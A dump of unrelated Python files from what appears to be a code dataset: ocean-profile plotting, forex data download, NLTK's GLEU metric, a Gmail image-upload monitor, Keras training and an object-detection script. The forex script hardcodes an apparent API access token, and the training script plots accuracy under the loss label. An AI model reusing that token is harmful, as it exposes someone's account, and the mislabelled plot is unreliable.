break #find farest on surface before diving
for i in range(start,len(List)-2):
if List[i]>=2 and List[i]>List[i+1]:
if List[i+1]<2 and List[i+1]>List[i+2]:
break #find nearest on surface after diving
return [start,i+1]
def closest_time(time, timelist, i=0):
'''
Return index of the closest time in the list
'''
index = len(timelist)
indx = int(index/2)
if timelist==[]:
return 'null'
if time>timelist[-1]:
return len(timelist)-1
if time<timelist[0]:
return 0
# return 'out'#raise Exception('{0} is not in {1}'.format(str(time), str(timelist)))
if index == 2:
l1, l2 = time-timelist[0], timelist[-1]-time
if l1 < l2:
i = i
else:
i = i+1
elif time == timelist[indx]:
i = i + indx
elif time > timelist[indx]:
i = closest_time(time, timelist[indx:],
i=i+indx)
elif time < timelist[indx]:
i = closest_time(time, timelist[0:indx+1], i=i)
return i
###########################################################################
obsData = pd.read_csv('ctdWithModTempByDepth.csv')
tf_index = np.where(obsData['TF'].notnull())[0] # get the index of good data
obsturtle_id=pd.Series(obsData['PTT'][tf_index],index=tf_index)
secondData=pd.read_csv('12487_location.csv')
tf_index1 = np.where(secondData['index'].notnull())[0]
tf_index2 =range(len(tf_index1))
time=pd.Series(secondData['time'],index=tf_index1)
depth=pd.Series(secondData['depth'],index=tf_index1)
temp=pd.Series(secondData['temp'],index=tf_index1)
inde=pd.Series(secondData['index'],index=tf_index1)
time.index=tf_index2
depth.index=tf_index2
temp.index=tf_index2
inde.index=tf_index2
indx=[]
for i in tf_index:
if obsturtle_id[i]==118905: #this turtle is same turtle with 4-second turtle
indx.append(i)
obsLon, obsLat = obsData['LON'][indx], obsData['LAT'][indx]
obsTime = pd.Series(np_datetime(obsData['END_DATE'][indx]), index=indx)
obsTemp = pd.Series(str2ndlist(obsData['TEMP_VALS'][indx]), index=indx)
obsDepth = pd.Series(str2ndlist(obsData['TEMP_DBAR'][indx]), index=indx)
Waterdepth=[]
for i in indx:
wd=-gettopo(obsLat[i],obsLon[i])
Waterdepth.append(wd)
Waterdepth=pd.Series(Waterdepth, index=indx)
for i in indx[0:2]:
waterdepth=Waterdepth[i]
print 'waterdepth: '+ str(waterdepth)
Index_all=[] #find indices which are in same area
for j in tf_index2:
if i==inde[j]:
Index_all.append(j)
newdepth=pd.Series(depth,index=Index_all)
newdepth.index=range(len(Index_all))
newtime=pd.Series(time,index=Index_all)
newtime.index=range(len(Index_all))
newtime=pd.to_datetime(newtime)
Index=[] # all dives for each profile
for k in range(len(newdepth)):
if newdepth[k]<2:
I=find_start(k,newdepth)
Index.append(I)
Index = [list(x) for x in set(tuple(x) for x in Index)]
Index.sort()
INdex=[] # all upcast index for each profile
top_time=[] #the time of end of one upcast
for k in range(len(Index)):
max_depth=max(newdepth[Index[k][0]:Index[k][1]+1])
bottom=[]
for j in range(Index[k][0],Index[k][1]+1):
if newdepth[j]==max_depth:
#if newdepth[j]>=waterdepth*0.7:
bottom.append(j)
if bottom==[]:
pass
else:
INdex.append([bottom[-1],Index[k][1]])
top_time.append(newtime[Index[k][1]])
N=closest_time(obsTime[i],top_time) #find the nearst index of upcast with profile.
if N=='null':
print str(i)+' do not dive to 70% of bottom of ocean'
pass
else:
for k in range(len(Index_all)):
if k==INdex[N][0]:
down=Index_all[k] #the clostest bottom index
if k==INdex[N][1]:
up=Index_all[k] #the clostest top index
print i
plt.figure()
plt.plot(temp[down:up],depth[down:up],'r',label='raw',linewidth=2)
plt.plot(obsTemp[i],obsDepth[i],'b', label='telemetered',linewidth=2)
plt.xlim([0, 30])
plt.ylim([max(obsDepth[i])+3, -1])
plt.xlabel('Temp', fontsize=10)
plt.ylabel('Depth', fontsize=10)
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.legend(loc='lower right')
plt.title(i,fontsize=14)
plt.text(1,0,'time:'+str(obsTime[i])+'')
plt.text(1,1,'location:'+str(round(obsLon[i],2))+', '+str(round(obsLat[i],2))+'')
plt.text(1,2,'waterdepth: '+ str(waterdepth)+'')
#plt.savefig('%s.png'%(i))
plt.show()
|
17,091 | d5e2df78c84ae4e248cd6d7b6b034820edbee623 | import json
from oandapyV20 import API
import pandas as pd
import numpy
from oandapyV20.contrib.factories import InstrumentsCandlesFactory
import csv
client = API(access_token='49c68257ae0870c5b76bbe63d4c79803-bc876dfcc6b0ebcc31ef73e45ebdbab8')
instrument, granularity = "GBP_USD", "H1"
_from = "2019-01-01T00:00:00Z"
_to = "2020-01-01T00:00:00Z"
params = {
"from": _from,
"granularity": granularity,
"to": _to
}
with open("//Users/user/PycharmProjects/LaureateForex/{}.{}".format(instrument+"Hourly", granularity), "w") as OUT:
#
# reader = csv.DictReader((open("//Users/user/PycharmProjects/LaureateForex/{}.csv")))
# for raw in reader:
# print(raw)
# The factory returns a generator generating consecutive
# requests to retrieve full history from date 'from' till 'to'
for r in InstrumentsCandlesFactory(instrument=instrument,params=params):
client.request(r)
OUT.write(json.dumps(r.response.get('candles'), indent=2))
try:
my_file_handle=open("//Users/user/PycharmProjects/LaureateForex/{}.csv")
except IOError:
print("File not found or path is incorrect")
finally:
print("exit") |
17,092 | 101c6e6f7d08f57b2bdd9b0a57b45c30bd06aec2 | # Natural Language Toolkit: GLEU Score
#
# Copyright (C) 2001-2023 NLTK Project
# Authors:
# Contributors: Mike Schuster, Michael Wayne Goodman, Liling Tan
# URL: <https://www.nltk.org/>
# For license information, see LICENSE.TXT
""" GLEU score implementation. """
from collections import Counter
from nltk.util import everygrams, ngrams
def sentence_gleu(references, hypothesis, min_len=1, max_len=4):
"""
Calculates the sentence level GLEU (Google-BLEU) score described in
Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi,
Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey,
Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Lukasz Kaiser,
Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens,
George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith,
Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes,
Jeffrey Dean. (2016) Google’s Neural Machine Translation System:
Bridging the Gap between Human and Machine Translation.
eprint arXiv:1609.08144. https://arxiv.org/pdf/1609.08144v2.pdf
Retrieved on 27 Oct 2016.
From Wu et al. (2016):
"The BLEU score has some undesirable properties when used for single
sentences, as it was designed to be a corpus measure. We therefore
use a slightly different score for our RL experiments which we call
the 'GLEU score'. For the GLEU score, we record all sub-sequences of
1, 2, 3 or 4 tokens in output and target sequence (n-grams). We then
compute a recall, which is the ratio of the number of matching n-grams
to the number of total n-grams in the target (ground truth) sequence,
and a precision, which is the ratio of the number of matching n-grams
to the number of total n-grams in the generated output sequence. Then
GLEU score is simply the minimum of recall and precision. This GLEU
score's range is always between 0 (no matches) and 1 (all match) and
it is symmetrical when switching output and target. According to
our experiments, GLEU score correlates quite well with the BLEU
metric on a corpus level but does not have its drawbacks for our per
sentence reward objective."
Note: The initial implementation only allowed a single reference, but now
a list of references is required (which is consistent with
bleu_score.sentence_bleu()).
The infamous "the the the ... " example
>>> ref = 'the cat is on the mat'.split()
>>> hyp = 'the the the the the the the'.split()
>>> sentence_gleu([ref], hyp) # doctest: +ELLIPSIS
0.0909...
An example to evaluate normal machine translation outputs
>>> ref1 = str('It is a guide to action that ensures that the military '
... 'will forever heed Party commands').split()
>>> hyp1 = str('It is a guide to action which ensures that the military '
... 'always obeys the commands of the party').split()
>>> hyp2 = str('It is to insure the troops forever hearing the activity '
... 'guidebook that party direct').split()
>>> sentence_gleu([ref1], hyp1) # doctest: +ELLIPSIS
0.4393...
>>> sentence_gleu([ref1], hyp2) # doctest: +ELLIPSIS
0.1206...
:param references: a list of reference sentences
:type references: list(list(str))
:param hypothesis: a hypothesis sentence
:type hypothesis: list(str)
:param min_len: The minimum order of n-gram this function should extract.
:type min_len: int
:param max_len: The maximum order of n-gram this function should extract.
:type max_len: int
:return: the sentence level GLEU score.
:rtype: float
"""
return corpus_gleu([references], [hypothesis], min_len=min_len, max_len=max_len)
def corpus_gleu(list_of_references, hypotheses, min_len=1, max_len=4):
"""
Calculate a single corpus-level GLEU score (aka. system-level GLEU) for all
the hypotheses and their respective references.
Instead of averaging the sentence level GLEU scores (i.e. macro-average
precision), Wu et al. (2016) sum up the matching tokens and the max of
hypothesis and reference tokens for each sentence, then compute using the
aggregate values.
From Mike Schuster (via email):
"For the corpus, we just add up the two statistics n_match and
n_all = max(n_all_output, n_all_target) for all sentences, then
calculate gleu_score = n_match / n_all, so it is not just a mean of
the sentence gleu scores (in our case, longer sentences count more,
which I think makes sense as they are more difficult to translate)."
>>> hyp1 = ['It', 'is', 'a', 'guide', 'to', 'action', 'which',
... 'ensures', 'that', 'the', 'military', 'always',
... 'obeys', 'the', 'commands', 'of', 'the', 'party']
>>> ref1a = ['It', 'is', 'a', 'guide', 'to', 'action', 'that',
... 'ensures', 'that', 'the', 'military', 'will', 'forever',
... 'heed', 'Party', 'commands']
>>> ref1b = ['It', 'is', 'the', 'guiding', 'principle', 'which',
... 'guarantees', 'the', 'military', 'forces', 'always',
... 'being', 'under', 'the', 'command', 'of', 'the', 'Party']
>>> ref1c = ['It', 'is', 'the', 'practical', 'guide', 'for', 'the',
... 'army', 'always', 'to', 'heed', 'the', 'directions',
... 'of', 'the', 'party']
>>> hyp2 = ['he', 'read', 'the', 'book', 'because', 'he', 'was',
... 'interested', 'in', 'world', 'history']
>>> ref2a = ['he', 'was', 'interested', 'in', 'world', 'history',
... 'because', 'he', 'read', 'the', 'book']
>>> list_of_references = [[ref1a, ref1b, ref1c], [ref2a]]
>>> hypotheses = [hyp1, hyp2]
>>> corpus_gleu(list_of_references, hypotheses) # doctest: +ELLIPSIS
0.5673...
The example below show that corpus_gleu() is different from averaging
sentence_gleu() for hypotheses
>>> score1 = sentence_gleu([ref1a], hyp1)
>>> score2 = sentence_gleu([ref2a], hyp2)
>>> (score1 + score2) / 2 # doctest: +ELLIPSIS
0.6144...
:param list_of_references: a list of reference sentences, w.r.t. hypotheses
:type list_of_references: list(list(list(str)))
:param hypotheses: a list of hypothesis sentences
:type hypotheses: list(list(str))
:param min_len: The minimum order of n-gram this function should extract.
:type min_len: int
:param max_len: The maximum order of n-gram this function should extract.
:type max_len: int
:return: The corpus-level GLEU score.
:rtype: float
"""
# sanity check
assert len(list_of_references) == len(
hypotheses
), "The number of hypotheses and their reference(s) should be the same"
# sum matches and max-token-lengths over all sentences
corpus_n_match = 0
corpus_n_all = 0
for references, hypothesis in zip(list_of_references, hypotheses):
hyp_ngrams = Counter(everygrams(hypothesis, min_len, max_len))
tpfp = sum(hyp_ngrams.values()) # True positives + False positives.
hyp_counts = []
for reference in references:
ref_ngrams = Counter(everygrams(reference, min_len, max_len))
tpfn = sum(ref_ngrams.values()) # True positives + False negatives.
overlap_ngrams = ref_ngrams & hyp_ngrams
tp = sum(overlap_ngrams.values()) # True positives.
# While GLEU is defined as the minimum of precision and
# recall, we can reduce the number of division operations by one by
# instead finding the maximum of the denominators for the precision
# and recall formulae, since the numerators are the same:
# precision = tp / tpfp
# recall = tp / tpfn
# gleu_score = min(precision, recall) == tp / max(tpfp, tpfn)
n_all = max(tpfp, tpfn)
if n_all > 0:
hyp_counts.append((tp, n_all))
# use the reference yielding the highest score
if hyp_counts:
n_match, n_all = max(hyp_counts, key=lambda hc: hc[0] / hc[1])
corpus_n_match += n_match
corpus_n_all += n_all
# corner case: empty corpus or empty references---don't divide by zero!
if corpus_n_all == 0:
gleu_score = 0.0
else:
gleu_score = corpus_n_match / corpus_n_all
return gleu_score
|
17,093 | bc6c4875c1f5eb5369db0c312c5b8c540a5bad69 | """
URLs for the wagtail admin dashboard.
"""
from django.urls import path
from wagtailcache.views import clear
from wagtailcache.views import index
urlpatterns = [
path("", index, name="index"),
path("clearcache", clear, name="clearcache"),
]
|
17,094 | 92827a868d83caefbe42437b46c5916eaf0fce7b | from typing import List
from omtools.core.variable import Variable
from omtools.core.input import Input
def collect_input_exprs(
inputs: list,
root: Variable,
expr: Variable,
) -> List[Variable]:
"""
Collect input nodes so that the resulting ``ImplicitComponent`` has
access to inputs outside of itself.
"""
for dependency in expr.dependencies:
if dependency.name != root.name:
if isinstance(dependency, Input) == True and len(
dependency.dependencies) == 0:
inputs.append(dependency)
inputs = collect_input_exprs(inputs, root, dependency)
return inputs
|
17,095 | 67fe5fded35c9a5d4209de75e6c5cecf967cf4e9 | import os, argparse
import tensorflow as tf
from tensorflow.python.framework import graph_util
from tensorflow import keras
from os import listdir
from os.path import isfile, isdir, join
if __name__ == '__main__':
mypath = "I:\dataSet/training dataset"
# 取得所有檔案與子目錄名稱
dfiles = listdir(mypath)
# 以迴圈處理
for f in dfiles:
# 產生檔案的絕對路徑
#fullpath = join(mypath, f)
print(f.title())
|
17,096 | ef7fb657938868481371ad34c6b52f291464a6a5 | B'''
Created on Nov 15, 2010
@0;278;0cauthor: surya
'''
import os
import sys
import time
import json
import email
import rfc822
import pycurl
import imaplib
import logging
import cStringIO
import string
from ImageUtils.ImageCache import ImageCache
from ImageUtils.sampleExifN80 import get_original_datetime_N80
from Logging.Logger import getLog
from Locking.AppLock import getLock
from IANAGmailSettings.Settings import setting
from GmailMonitorFramework.GmailMonitorFramework import GmailMonitorFramework
from email.mime.text import MIMEText
import datetime
class IANAGmailMonitor(GmailMonitorFramework):
''' This class implements the functionality to poll gmail accounts for
image data, and uploads it to the SuryaWebPortal to be stored in
the database for subsequent Image Analysis.
'''
def __init__(self):
''' Constructor
'''
self.imcache = ImageCache('/home/surya/imagecache')
@staticmethod
def remove_undecodable_from_dict(inputDict):
'''Remove any (k, v) which contains characters json can not decode'''
# move this function to some general util library?
poplist = []
for (k, v) in inputDict.items():
try:
json.encoder.encode_basestring_ascii(k)
except UnicodeDecodeError:
poplist.append(k)
continue
try:
json.encoder.encode_basestring_ascii(v)
except UnicodeDecodeError:
poplist.append(k)
for p in poplist:
inputDict.pop(p)
return inputDict
def checkInbox(self):
''' Refer GmailMonitorFramework.checkInbox for documentation.
'''
tags = self.gmontags + " IANA"
self.log.info("Checking Gmail... {0}".format(str(setting.get("poll_interval"))), extra=tags)
gmailConn = imaplib.IMAP4_SSL(setting.get("imap_host"), setting.get("imap_port"))
#Login: ('OK', ['20'])
(status, rsps) = gmailConn.login(setting.get("username"), setting.get("password"))
if status == 'OK':
self.log.info("Login successfully username: " + setting.get("username"), extra=tags)
else:
self.log.error("Login fail." + str(status) + ":" + str( rsps), extra=tags)
raise 'Gmail Login Failed'
#Select INBOX: ('OK', ['20'])
(status, rsps) = gmailConn.select("INBOX")
if status == 'OK':
self.log.info("Selecting INBOX successfully.", extra=tags)
else:
self.log.error("Cannot select INBOX" + str(status) + ":" + str( rsps), extra=tags)
raise 'Inbox Selection Failed'
# Search UNSEEN UNDELETED: ('OK', ['1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19'])
(status, rsps) = gmailConn.search(None, "(UNSEEN UNDELETED)")
mailIds = rsps[0].split()
if status == 'OK':
self.log.info("Finding {0:s} new emails.".format(str(len(mailIds))) +
("unprocessed mail ids: " + rsps[0]) if len(mailIds) else "", extra=tags)
else:
self.log.error("Errors while searching (UNSEEN UNDELETED) mails."+ str(status) + ":" + str(rsps), extra=tags)
return 'Errors searching for Unseen mails'
for mid in mailIds:
(status, rsps) = gmailConn.fetch(mid, '(RFC822)')
if status == 'OK':
self.log.info("Successfully fetching mail (mail id:{0:s})...".format(str(mid)), extra=tags)
else:
self.log.error("Errors while fetching mail (mail id:{0:s})...".format(str(mid)), extra=tags)
continue
mailText = rsps[0][1]
mail = email.message_from_string(mailText)
fromField = rfc822.parseaddr(mail.get("FROM").lower())[1]
toField = rfc822.parseaddr(mail.get("TO").lower())[1]
subjectField = mail.get("SUBJECT") # should be szu###
if "Result" in subjectField:
continue
#TODO: add spam detection: only from "surya." with subject "szu" is considered valid.
self.log.info("The mail (id: {0:s}) is from: <{1:s}> and to: <{2:s}> with subject: {3:s}"
.format(str(mid), fromField, toField, subjectField), extra=tags)
configDict = {"fromemail":fromField, "toemail":toField}
isImage = False
#Downloading attachment from gmail
parts = mail.walk()
for p in parts:
if 'text/plain' in p.get_content_type():
message = p.get_payload(decode=True)
self.log.info('payload: '+str(message), extra=tags)
if message is not None:
configParams = [v.split(':', 1) for v in message.splitlines() if ':' in v]
for param in configParams:
configDict[param[0].strip().lower()] = param[1].strip(string.punctuation + ' ').lower()
continue
if p.get_content_maintype() !='multipart' and p.get('Content-Disposition') is not None:
fdata = p.get_payload(decode=True)
filename = p.get_filename()
configDict['origfilename'] = filename
# Store the file in the file cache
self.log.info("Storing file: " + filename)
picFileName = self.imcache.put(filename, fdata)
if picFileName is None:
self.log.error('Could Not save ' + filename + ' in the cache', extra=tags)
continue
#Reading EXIF info
(status, pic_datetime_info) = get_original_datetime_N80(picFileName)
if status:
self.log.info("From Exif metadata, the picture {0:s} is taken at {1:s}"
.format(picFileName, pic_datetime_info.strftime("%Y,%m,%d,%H,%M,%S")).replace(',0',','), extra=tags)
else:
self.log.error("Cannot get original datetime from picture: " + picFileName + "details: " + str(pic_datetime_info), extra=tags)
pic_datetime_info = datetime.datetime.now()
#self.imcache.remove(filename) #set the current datetime
#continue # try next part
isImage = True
if isImage:
# Check for invalid characters in dictionary that json convertor can not handle
configDict = IANAGmailMonitor.remove_undecodable_from_dict(configDict)
message = json.dumps(configDict)
#Upload to http server
response = cStringIO.StringIO()
curl = pycurl.Curl()
curl.setopt(curl.WRITEFUNCTION, response.write)
curl.setopt(curl.POST, 1)
curl.setopt(curl.URL, setting.get("upload_url"))
curl.setopt(curl.HTTPPOST,[
("device_id", fromField),
("aux_id", ""), #TODO: using CronJob to read QR code
("misc", message), #not used
("record_datetime", pic_datetime_info.strftime("%Y,%m,%d,%H,%M,%S").replace(',0',',')), #change 08->8, otherwise the server will complaints because we cannot run datetime(2010,08,23,18,1,1)
#("gps", ""), #not used # needs to change to three post values instead of one
("datatype", "image"),
("mimetype", "image/jpeg"),
("version", setting.get("http_post_version")),
("deployment_id", toField[0:toField.index('@')]), #e.g. surya.pltk1 ("from email")
("tag", ""), #not used
("data", (curl.FORM_FILE, picFileName))
])
curl.perform()
self.log.info("Running http post to: "+setting.get("upload_url"), extra=tags)
server_rsp = str(response.getvalue())
curl.close()
if str(server_rsp).startswith("upok"):
self.log.info("Successfully Uploading."+ str(server_rsp), extra=tags)
else:
self.log.error("The server returns errors."+ str(server_rsp), extra=tags)
self.imcache.remove(filename)
self.log.info("Deleting uploaded temporary file: " + str(picFileName), extra=tags)
gmailConn.close()
gmailConn.logout()
if __name__ == '__main__':
runinterval = 10
if len(sys.argv) > 1:
runinterval = int(sys.argv[1])
gmon = IANAGmailMonitor()
gmon.run("IANAGmailMonitor.pid", "IANAGmailMonitor", runinterval)
|
17,097 | 2d844dad3a8931b8da6946c3502cef466e0f0b80 | from tensorflow.keras.optimizers import Adam, SGD, RMSprop
from config import emotion_config as config
from hdf5datasetgenerator import HDF5DatasetGenerator
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from emotionModel import EmotionDetectModel
from emotionModelTransfer import TranserLearningModel
from utils.imagetoarraypreprocess import ImageToArrayPreprocess
from tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, Callback
from utils.trainmonitor import TrainingMonitor
import tensorflow as tf
import matplotlib.pyplot as plt
import argparse
import os
class EarlyStopTraining(Callback):
def on_epoch_end(self, epoch, logs = {}):
if logs['accuracy'] >= 0.9:
print('\nReach the desire accuracy so stop training')
self.model.stop_training = True
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--checkpoints", required=True, help="path to output checkpoint directory")
args = vars(ap.parse_args())
model = EmotionDetectModel() #Appoach 1
model.summary()
# model = TranserLearningModel() #Approach 2
train_datagen = ImageDataGenerator(
rescale = 1.0/255,
rotation_range = 20,
width_shift_range = 0.15,
height_shift_range = 0.15,
zoom_range = 0.1,
shear_range = 0.2,
horizontal_flip= True,
fill_mode = 'nearest'
)
val_datagen = ImageDataGenerator(
rescale = 1.0/255
)
iap = ImageToArrayPreprocess()
trainGen = HDF5DatasetGenerator(config.TRAIN_HDF5, config.BATCH_SIZE, aug=train_datagen, preprocessors=[iap], classes=config.NUM_CLASSES)
valGen = HDF5DatasetGenerator(config.VAL_HDF5, config.BATCH_SIZE, aug=val_datagen, preprocessors=[iap], classes=config.NUM_CLASSES)
EPOCHS = 100
INIT_LR = 1e-2
DECAY_RATE = 1.0
FACTOR = 0.1
lr_decay_1 = LearningRateScheduler(lambda epoch: INIT_LR*(1/(1 + DECAY_RATE*epoch)))
lr_decay_2 = LearningRateScheduler(lambda epoch: INIT_LR*FACTOR**(epoch/10))
figPath = os.path.sep.join([config.OUTPUT_PATH, "Duynet_emotion.png"])
jsonPath = os.path.sep.join([config.OUTPUT_PATH, "Duynet_emotion.json"])
monitor = TrainingMonitor(figPath, jsonPath=jsonPath, startAt=0)
checkpoint = ModelCheckpoint(
save_best_only = True,
monitor = 'val_loss',
mode = 'min',
filepath = args['checkpoints'],
verbose = 1
)
stop_train = EarlyStopTraining()
callbacks = [monitor, checkpoint, stop_train]
adam = Adam(lr = INIT_LR, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
model.compile(optimizer = adam, loss = tf.keras.losses.CategoricalCrossentropy(), metrics = ['accuracy'])
history = model.fit_generator(
trainGen.generator(),
epochs = EPOCHS,
steps_per_epoch = trainGen.numImages // config.BATCH_SIZE,
validation_data = valGen.generator(),
validation_steps = valGen.numImages // config.BATCH_SIZE,
callbacks = callbacks,
verbose = 1
)
trainGen.close()
valGen.close()
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'r', label = 'train_accuracy')
plt.plot(epochs, val_acc, 'b', label = 'val_accuracy')
plt.title('Train acc and Val acc')
plt.xlabel('Epochs')
plt.ylabel('Acc')
plt.legend()
plt.figure()
plt.plot(epochs, acc, 'r', label = 'train_loss')
plt.plot(epochs, acc, 'b', label = 'val_loss')
plt.title('Train loss and Val loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.figure()
|
17,098 | 2091b82c86dd0683df3a4604338f540a3259cf3e | from itertools import permutations
def possible_permutations(elements):
perm = permutations(elements)
for p in perm:
yield list(p)
[print(n) for n in possible_permutations([1, 2, 3])]
|
17,099 | d59da234469146b33a081d70e8ff2deff22292f4 | from detection_api import Detector
from detection_api.utils.parse_config import *
from detection_api.utils.utils import *
import cv2
import os
import os.path as osp
import numpy as np
from PIL import Image
from settings import Settings
import utils
from lxml import etree as Element
class BBoxClass:
def __init__(self, label, x1, y1, x2, y2, score):
self.label = label
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.score = score
class ImageClass:
def __init__(self, id, name, width, height):
self.id = id
self.name = name
self.width = width
self.height = height
self.bbox_list = [] # type: [BBoxClass]
if __name__ == '__main__':
settings = Settings()
if not osp.exists(settings.input_dir):
raise FileNotFoundError(f"{settings.input_dir} directory not exists.")
os.makedirs(settings.output_dir, exist_ok=True)
root = os.path.dirname(os.path.realpath(__file__))
data_config = parse_data_config(os.path.join(root, settings.config_path))
classes = load_classes(os.path.join(root, "detection_api", data_config["names"]))
if not osp.exists(settings.input_dir):
raise FileNotFoundError(f"{settings.input_dir} directory not exists.")
os.makedirs(settings.output_dir, exist_ok=True)
dataset = utils.get_dataset(settings.input_dir)
images = {} # path: ImageClass
### DETECTION ###
print('Start Detection...')
print('Creating networks and loading parameters')
license_plate_api = Detector(settings)
print('Preparing detector...')
license_plate_api.detect(np.zeros((1080, 1920, 3), dtype=np.uint8))
global_img_id = 0
for cls in dataset:
save_class_dir = osp.join(settings.output_dir, cls.name)
cls.image_paths = sorted(cls.image_paths)
if not os.path.exists(save_class_dir):
os.mkdir(save_class_dir)
for i, image_path in enumerate(cls.image_paths):
print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
img = np.array(Image.open(image_path).convert('RGB'))
img_height, img_width = img.shape[0:2]
# Register image info
img_info = ImageClass(global_img_id, image_path, img_width, img_height)
# get bbox result
bboxes, labels = license_plate_api.detect(img) # (x1, y1, x2, y2, score)
bboxes = utils.filter_too_big(bboxes, settings.max_size_ratio, img_width, img_height)
for idx, bbox in enumerate(bboxes):
x1, y1, x2, y2, score = bbox
label = classes[int(labels[idx])]
bbox_info = BBoxClass(label, x1, y1, x2, y2, score)
img_info.bbox_list.append(bbox_info)
images[image_path] = img_info
global_img_id += 1
del license_plate_api
### RENDERING RESULT ###
print(f"Rendering result... save_img={settings.save_img}")
if settings.save_img:
for cls in dataset:
save_class_dir = osp.join(settings.output_dir, cls.name)
cls.image_paths = sorted(cls.image_paths)
for i, image_path in enumerate(cls.image_paths):
print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
img_save_path = osp.join(save_class_dir, '{}_detected.jpg'.format(osp.splitext(osp.split(image_path)[-1])[0]))
img = np.array(Image.open(image_path).convert('RGB'))
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
for bbox in images[image_path].bbox_list:
if isinstance(bbox, BBoxClass):
label, x1, y1, x2, y2, score = str(bbox.label), int(bbox.x1), int(bbox.y1), int(bbox.x2), int(bbox.y2), float(bbox.score)
red, green, blue, thickness = settings.bbox_red, settings.bbox_green, settings.bbox_blue, settings.bbox_thickness
cv2.rectangle(img, (x1, y1), (x2, y2), (blue, green, red), thickness=thickness)
if settings.show_score:
cv2.putText(img, '{}:{}%'.format(label, int(score * 100)), (x1, y1),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, color=(0, 0, 255), thickness=2)
cv2.imwrite(img_save_path, img)
else:
raise TypeError("bbox object should be instance of BBoxClass")
### GENERATE XML ###
print('Generating XML files...')
for cls in dataset:
save_class_dir = osp.join(settings.output_dir, cls.name)
cls.image_paths = sorted(cls.image_paths)
save_path = osp.join(save_class_dir, '{}.xml'.format(cls.name))
_annotation = Element.Element('annotations')
for i, image_path in enumerate(cls.image_paths):
print('[{}/{}] {}'.format(i + 1, len(cls.image_paths), image_path))
info = images[image_path]
imageXML = Element.Element('image')
imageXML.set('id', str(info.id))
imageXML.set('name', os.path.split(image_path)[-1])
imageXML.set('width', str(info.width))
imageXML.set('height', str(info.height))
for b in info.bbox_list:
if isinstance(b, BBoxClass):
xmin = max(min(b.x1, b.x2), 0)
ymin = max(min(b.y1, b.y2), 0)
xmax = min(max(b.x1, b.x2), info.width)
ymax = min(max(b.y1, b.y2), info.height)
boxXML = Element.Element('box')
boxXML.set('label', b.label)
boxXML.set('xtl', str(xmin))
boxXML.set('ytl', str(ymin))
boxXML.set('xbr', str(xmax))
boxXML.set('ybr', str(ymax))
imageXML.append(boxXML)
else:
raise TypeError("bbox object should be instance of BBoxClass")
_annotation.append(imageXML)
with open(save_path, 'w') as f:
print('Saving xml to {}'.format(save_path))
f.write((Element.tostring(_annotation, pretty_print=True)).decode('utf-8'))
print('Done.')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.